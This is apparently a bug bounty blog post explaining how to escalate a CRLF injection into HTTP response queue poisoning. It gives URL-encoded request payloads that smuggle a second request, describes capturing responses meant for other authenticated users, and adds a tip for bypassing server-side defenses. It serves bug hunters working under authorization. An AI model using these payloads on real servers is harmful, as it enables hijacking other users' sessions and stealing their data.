Week 57 - Response Queue Poisoning

Did you know you can likely upgrade CRLF Injection to a Critical finding? Many bug bounty programs consider it medium-severity and on par with XSS. In this post, I will show you how to make it P1 through Response Queue Poisoning!

To accomplish this, we first need to find a way of injecting the classic %0d%0a somewhere in the request. I recommend targeting the URL itself or another parameter that is reflected in the response headers (like Location). For reference, %0d%0a refers to:

Carriage Return = \r (%0d)

Line feed = \n (%0a)

^ Read more about it on one of my previous posts linked in comments

Now let’s say we discovered the below CRLF injection. Before upgrading the severity, we need to form a clean request with our line breaks. The %0d%0a represent a new line break between headers, and the added Connection and Host headers allow for a complete request.

GET /%20HTTP/1.1%0d%0aHost:%20redacted[.]net%0d%0aConnection:%20keep-alive%0d%0a%0d%0a HTTP/1.1

We have a complete request we were able to inject on the server. Now, let’s upgrade this to critical. What the below request does is tell the back-end server to issue 2 responses. The back-end server sees only one request but has two responses and gets confused:

GET /%20HTTP/1.1%0d%0aHost:%20redacted[.]net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/%20HTTP/1.1%0d%0aFoo:%20bar HTTP/1.1

Notice the “Foo: bar” header at the end. This is to cancel out the “GET /randompage” that will be appended by a victim’s incoming request we will overlap and steal.

So the server ends up with a response that has no matching request. This response is held in the queue until the server receives another request, then it sends it forward. As you can see, this throws off the server by one request, and the cycle is repeated until the keep-alive connection is terminated.

The end result is intermittently receiving responses intended for other authenticated users and a critical finding for us hackers. This attack is known as Response Queue Poisoning.

If you are having trouble visualizing this, I found a beautiful explanation by PortSwigger I wanted to include:

“As there are no further requests awaiting a response, the unexpected second response is held in a queue on the connection between the front-end and back-end.

When the front-end receives another request, it forwards this to the back-end as normal. However, when issuing the response, it will send the first one in the queue, that is, the leftover response to the smuggled request.

The correct response from the back-end is then left without a matching request. This cycle is repeated every time a new request is forwarded down the same connection to the back-end. “

Note:

If you are having trouble exploiting this, try with a large number of newlines, this has been known to bypass some server-side defense mechanisms. Check out the article linked in the comments for more info.

Last updated